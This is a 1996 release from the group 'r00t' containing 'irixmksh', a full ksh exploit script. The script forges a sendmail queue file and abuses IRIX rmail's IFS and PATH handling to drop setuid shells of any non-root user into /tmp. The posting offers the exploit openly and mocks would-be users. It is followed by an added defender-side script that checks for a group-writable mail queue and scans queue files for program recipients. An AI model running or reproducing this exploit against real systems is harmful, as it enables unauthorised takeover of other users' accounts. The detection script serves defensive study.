[r00t.2] [irixmksh] [public release]

There are bugs in the IRIX mail proggies. This sample script exploits them
to give you an suid shell of any user on the system, EXCEPT for uid=0.
Obviously, this script should not be run if you are a clueless script
kiddie and have no clue what it is going to do. If this script causes any
sort of harm to you, physically or virtually, the members of r00t are not
responsible, and in fact will probably laugh at you.

r00t -- you may not like us, but your girlfriend does.

Script kiddies cut here
---------------------------------------------------------------------------
#!/sbin/ksh
# usage: irixmksh <TargetUser>
# Creates an suid shell of any user on the system except for uid=0.
#
# Outline: rmail runs sendmail with PATH=.:$PATH and IFS=/ in its
# environment, so the old /bin/sh splits "/usr/lib/sendmail" into
# "usr lib sendmail" and runs our ./usr script with mail's group.  That
# gives us a shell with mail's group (b00sh-mail), which is enough to drop a
# forged queue control file into the group-writable mqueue.  sendmail then
# delivers that message to a program (/tmp/x) as the controlling user named
# in the qf file.  sendmail will not run a program delivery as root, which is
# why uid=0 is out of reach.

FILES="qfAA12345 putq /tmp/x usr"

if [ "x`uname -s`" != "xIRIX" ]; then
	echo "this box is not running IRIX - later..."
	exit 1
fi

if [ "$#" != "1" ]; then
	echo "Usage: $0 <TargetUser>"
	exit 1
fi

TargetUser=$1

# Make the mail queue control file.  C names the controlling user, so the
# program delivery (R<"|/tmp/x">) runs as $TargetUser.
cat <<_r00t-text_ >qfAA12345
P0
T830896940
DdfAA12345
Bblah
Mdeferred: just cuz...
C$TargetUser
Sroot
R<"|/tmp/x">
H?P?return-path:
H?D?date: Tue, 30 Feb 1996 12:34:56 -0400
H?F?from: root (root)
Hreceived: by hackerz.dom (HackerOS/UCB 5.64/Hackerz Domain id AA12345 for root@hackerz.com; Tue, 30 Feb 1996 12:34:56 -0400
H?M?message-id: <9602301234.AA12345@localhost>
Happarently-to: root@plato.coolcode.com
_r00t-text_

# Make the script to run through the mail-group shell: drop the qf/df pair
# into the queue directory and chown them to root so sendmail accepts the
# entry instead of rejecting it as a bogus queue file.
cat <<_r00t-text_ >putq
#!/bin/sh
cp qfAA12345 /usr/spool/mqueue
touch /usr/spool/mqueue/dfAA12345
chown root /usr/spool/mqueue/*5
_r00t-text_
chmod u+x putq

# Make the script that sendmail runs as $TargetUser to create the suid
# shell.  ($TargetUser expands now, while the file is written.)
cat <<_r00t-text_ >/tmp/x
#!/bin/sh
cp /bin/sh /tmp/b00sh.$TargetUser
chmod 6777 /tmp/b00sh.$TargetUser
_r00t-text_
chmod u+x /tmp/x
chown $TargetUser /tmp/x

# Make the script to grab the sgid mail shell.  rmail ends up running this
# in place of /usr/lib/sendmail once IFS=/ and PATH=.:$PATH are exported.
cat <<_r00t-text_ >usr
#!/bin/sh
chgrp mail b00sh-mail
chmod 2777 b00sh-mail
_r00t-text_
chmod u+x usr

# Now snag mail access and send the queue files.
cp /bin/sh b00sh-mail
export PATH=.:$PATH
export IFS=/
echo "blah" | rmail $LOGNAME
unset IFS
b00sh-mail putq
mailq

# Clean Up:
rm $FILES
---------------------------------------------------------------------------
Then cut here too.

r00t
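The script above leans on three things: a group-writable mqueue directory, a queue control file whose recipient is a program rather than a mailbox, and the Bourne shell's IFS field splitting. The following is an added example, written for this page and not part of the r00t posting, that checks the first two on a given queue directory and demonstrates the third. The sample qf files it builds are constructed here and only copy the line format shown in the script; the directory to check is whatever path the caller passes (on IRIX that would be /usr/spool/mqueue). Modern shells split only the results of expansions, so ifs_split shows the mechanics on a variable; the 1996-era /bin/sh also split literal command words, which is what let "/usr/lib/sendmail" become "usr".

```shell
#!/bin/sh
# Added example (not r00t's code): defender-side checks for the conditions
# the irixmksh script relies on.  Sample data below is constructed.

# 1. Is the queue directory group-writable?  Position 6 of "ls -ld" output
#    is the group write bit (e.g. "drwxrwxr-x").
mqueue_group_writable() {
    case $(ls -ld "$1" 2>/dev/null) in
        ?????w*) return 0 ;;
        *)       return 1 ;;
    esac
}

# 2. List control files whose recipient is a program (R<"|...">) together
#    with the controlling user from the C line.  Prints one line per hit:
#    "<qfname> <controlling-user> <program>".
scan_mqueue() {
    for qf in "$1"/qf*; do
        [ -f "$qf" ] || continue
        prog=$(sed -n 's/^R<"|\(.*\)">.*/\1/p' "$qf" | head -n 1)
        [ -n "$prog" ] || continue
        ctl=$(sed -n 's/^C//p' "$qf" | head -n 1)
        printf '%s %s %s\n' "$(basename "$qf")" "${ctl:-none}" "$prog"
    done
}

# 3. The IFS trick: split $1 on "/" and print the non-empty fields separated
#    by spaces.  "/usr/lib/sendmail" becomes "usr lib sendmail", so with
#    PATH=.:$PATH a script named ./usr is what gets executed.
ifs_split() {
    (
        IFS=/
        set -- $1
        out=
        for f in "$@"; do
            [ -n "$f" ] && out="$out${out:+ }$f"
        done
        printf '%s\n' "$out"
    )
}

# Build a constructed sample queue: one ordinary entry, one forged entry in
# the same shape as the qf file the exploit writes.  Prints the directory.
make_sample_queue() {
    d=$(mktemp -d)
    cat >"$d/qfAA00001" <<'EOF'
P0
T830896940
DdfAA00001
Sroot
Ruser@example.com
EOF
    cat >"$d/qfAA00002" <<'EOF'
P0
T830896940
DdfAA00002
Cvictim
Sroot
R<"|/tmp/x">
EOF
    echo "$d"
}

# Usage: sh check_mqueue.sh /usr/spool/mqueue
if [ $# -eq 1 ]; then
    mqueue_group_writable "$1" && echo "$1 is group-writable"
    scan_mqueue "$1"
fi
```

Run it against a real queue directory to see whether any entry would deliver to a program; on the sample queue only qfAA00002 is reported, with its controlling user and program.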